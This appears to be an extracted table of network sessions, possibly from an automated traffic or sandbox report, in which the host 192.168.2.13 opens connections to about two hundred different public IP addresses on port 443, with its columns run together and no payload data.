                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22546192.168.2.1358016130.177.101.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22547192.168.2.1354472158.68.124.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22548192.168.2.136087668.65.127.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22549192.168.2.1349856142.237.187.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22550192.168.2.133494263.200.50.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22551192.168.2.1353534116.64.178.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22552192.168.2.133366219.250.227.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22553192.168.2.1336726174.78.194.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22554192.168.2.1350882213.8.133.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22555192.168.2.1338438211.113.76.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22556192.168.2.1356364125.92.228.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22557192.168.2.135108294.57.171.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22558192.168.2.1343406153.190.214.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22559192.168.2.1337644117.209.27.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22560192.168.2.1337384196.94.151.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22561192.168.2.1342466154.122.167.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22562192.168.2.1335864174.198.10.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22563192.168.2.1338544133.227.216.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22564192.168.2.134208091.104.135.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22565192.168.2.1355968152.156.63.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22566192.168.2.1334884106.14.224.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22567192.168.2.1352318104.23.229.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22568192.168.2.134190240.139.226.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22569192.168.2.1350248115.147.175.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22570192.168.2.135665060.237.131.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22571192.168.2.134888073.209.231.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22572192.168.2.1345452223.129.196.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22573192.168.2.135662295.198.32.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22574192.168.2.1345818162.15.233.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22575192.168.2.135601297.113.103.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22576192.168.2.134425040.245.36.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22577192.168.2.133466474.63.25.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22578192.168.2.135763089.152.41.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22579192.168.2.1350922103.186.47.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22580192.168.2.1350414172.162.90.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22581192.168.2.133907852.234.87.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22582192.168.2.1337864189.227.239.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22583192.168.2.1343188142.190.148.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22584192.168.2.1352846113.157.216.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22585192.168.2.1346330217.22.94.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22586192.168.2.1343406131.215.136.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22587192.168.2.1352974193.123.91.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22588192.168.2.134029269.125.251.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22589192.168.2.134055047.171.230.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22590192.168.2.13381068.34.1.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22591192.168.2.1334726181.139.98.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22592192.168.2.1339220126.155.148.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22593192.168.2.134916295.49.26.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22594192.168.2.13561322.16.121.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22595192.168.2.1333810176.12.129.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22596192.168.2.1337022212.38.238.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22597192.168.2.1334322179.254.20.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22598192.168.2.1335840118.27.125.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22599192.168.2.134331620.151.140.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22600192.168.2.134121271.178.19.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22601192.168.2.13408481.81.81.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22602192.168.2.1332950203.225.135.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22603192.168.2.135485824.16.88.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22604192.168.2.1342114148.40.42.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22605192.168.2.134549497.10.100.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22606192.168.2.1336920219.71.216.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22607192.168.2.133869689.16.215.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22608192.168.2.134859237.53.122.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22609192.168.2.133492827.231.229.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22610192.168.2.1336484133.253.26.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22611192.168.2.1334154211.58.91.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22612192.168.2.1349544143.151.48.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22613192.168.2.133338444.226.206.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22614192.168.2.136098868.23.223.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22615192.168.2.134436650.116.49.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22616192.168.2.13507005.243.29.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22617192.168.2.1347440221.59.44.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22618192.168.2.135210453.23.211.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22619192.168.2.1358086150.228.245.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22620192.168.2.133778458.210.9.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22621192.168.2.133695073.31.83.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22622192.168.2.1356896129.188.34.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22623192.168.2.1340578219.246.141.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22624192.168.2.1357378123.223.142.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22625192.168.2.1350782152.237.249.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22626192.168.2.1346342203.228.232.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22627192.168.2.1348384174.145.117.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22628192.168.2.1360098204.98.65.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22629192.168.2.1341406172.171.2.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22630192.168.2.1355890172.208.96.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22631192.168.2.134866014.153.242.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22632192.168.2.134092665.176.219.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22633192.168.2.1357106193.71.87.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22634192.168.2.1343688101.65.93.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22635192.168.2.1355490191.140.72.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22636192.168.2.1334626109.89.48.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22637192.168.2.135445491.74.148.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22638192.168.2.135737432.106.135.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22639192.168.2.1356918152.225.118.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22640192.168.2.133561619.206.160.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22641192.168.2.133715692.35.66.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22642192.168.2.1360454179.181.17.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22643192.168.2.134172278.146.131.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22644192.168.2.1335908199.184.255.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22645192.168.2.1354012166.40.55.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22646192.168.2.134278883.152.58.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22647192.168.2.1345340154.102.89.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22648192.168.2.135040491.234.45.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22649192.168.2.1341342160.96.209.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22650192.168.2.1336804129.110.138.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22651192.168.2.133741419.172.229.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22652192.168.2.134283287.7.250.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22653192.168.2.134271680.3.65.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22654192.168.2.134206666.178.165.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22655192.168.2.1354004148.3.224.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22656192.168.2.1339898133.161.43.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22657192.168.2.13544381.87.42.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22658192.168.2.1345908199.90.33.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22659192.168.2.134832412.94.143.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22660192.168.2.1332770107.248.5.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22661192.168.2.13605304.245.190.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22662192.168.2.1349562165.108.108.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22663192.168.2.1335624160.103.81.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22664192.168.2.1337144135.71.207.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22665192.168.2.1358358204.143.172.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22666192.168.2.1358478198.196.160.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22667192.168.2.133456032.97.15.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22668192.168.2.1350268213.198.121.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22669192.168.2.1349722191.51.103.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22670192.168.2.134410640.160.226.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22671192.168.2.1341448192.187.174.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22672192.168.2.13419764.116.56.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22673192.168.2.1341074172.232.68.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22674192.168.2.1336522122.171.34.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22675192.168.2.134158427.244.211.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22676192.168.2.1347002109.174.81.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22677192.168.2.1336552191.173.213.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22678192.168.2.1354836203.92.46.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22679192.168.2.1336924106.173.66.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22680192.168.2.1340522119.238.194.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22681192.168.2.133567071.33.187.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22682192.168.2.13464041.27.88.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22683192.168.2.1338712172.249.150.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22684192.168.2.133877038.159.25.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22685192.168.2.135553895.64.77.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22686192.168.2.1358614168.118.48.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22687192.168.2.1343256125.51.198.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22688192.168.2.134284452.219.119.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22689192.168.2.1348192149.212.237.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22690192.168.2.135947838.228.141.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22691192.168.2.135753897.191.153.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22692192.168.2.135339039.171.221.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22693192.168.2.1340260176.156.190.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22694192.168.2.134350294.107.3.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22695192.168.2.1356676132.29.250.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22696192.168.2.1347550194.203.212.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22697192.168.2.1337768165.155.144.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22698192.168.2.1357058115.7.189.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22699192.168.2.1350466122.5.107.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22700192.168.2.1352632171.130.49.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22701192.168.2.134304058.212.12.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22702192.168.2.13423045.229.159.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22703192.168.2.13516985.169.75.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22704192.168.2.135519299.119.183.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22705192.168.2.133856412.77.207.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22706192.168.2.134894427.67.80.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22707192.168.2.1333654173.46.28.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22708192.168.2.133878638.106.239.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22709192.168.2.1334178189.198.73.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22710192.168.2.1333078181.199.151.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22711192.168.2.1339888176.46.8.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22712192.168.2.1353334185.9.125.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22713192.168.2.134640293.117.93.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22714192.168.2.1344990195.237.89.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22715192.168.2.1342440185.23.158.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22716192.168.2.1339722109.234.140.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22717192.168.2.1338726186.92.22.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22718192.168.2.1340746102.232.54.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22719192.168.2.1360410196.137.163.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22720192.168.2.135099480.131.113.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22721192.168.2.1353328184.94.160.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22722192.168.2.135593658.235.152.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22723192.168.2.133528873.9.209.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22724192.168.2.134336419.120.140.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22725192.168.2.136064024.227.147.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22726192.168.2.1356694118.120.100.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22727192.168.2.1338652190.11.46.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22728192.168.2.135833414.231.93.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22729192.168.2.135899620.79.53.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22730192.168.2.1338150207.91.87.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22731192.168.2.133835848.107.37.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22732192.168.2.135350254.225.127.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22733192.168.2.1348064220.173.28.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22734192.168.2.1342530194.220.232.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22735192.168.2.1352786217.171.31.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22736192.168.2.1336066142.168.192.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22737192.168.2.1346592112.65.129.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22738192.168.2.13384444.133.183.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22739192.168.2.134029448.184.89.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22740192.168.2.1347606175.168.172.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22741192.168.2.1345544141.205.203.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22742192.168.2.135116880.192.11.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22743192.168.2.134304419.189.151.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22744192.168.2.134458024.153.45.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22745192.168.2.1337294177.55.244.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22746192.168.2.1350188116.237.249.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22747192.168.2.134963652.149.186.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22748192.168.2.1338040110.194.128.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22749192.168.2.135840014.15.183.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22750192.168.2.1359012161.0.80.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22751192.168.2.1341418125.227.208.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22752192.168.2.134594488.241.120.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22753192.168.2.1333300132.125.105.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22754192.168.2.134420249.253.173.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22755192.168.2.135760071.122.245.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22756192.168.2.1337146185.248.17.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22757192.168.2.134756686.14.66.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22758192.168.2.1354094174.159.125.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22759192.168.2.1351042101.71.108.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22760192.168.2.1339422180.150.113.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22761192.168.2.1351688153.169.59.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22762192.168.2.1355094124.87.174.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22763192.168.2.1358546190.77.35.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22764192.168.2.1360480160.1.198.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22765192.168.2.134954483.116.105.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22766192.168.2.134852096.119.214.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22767192.168.2.1338688205.92.158.126443
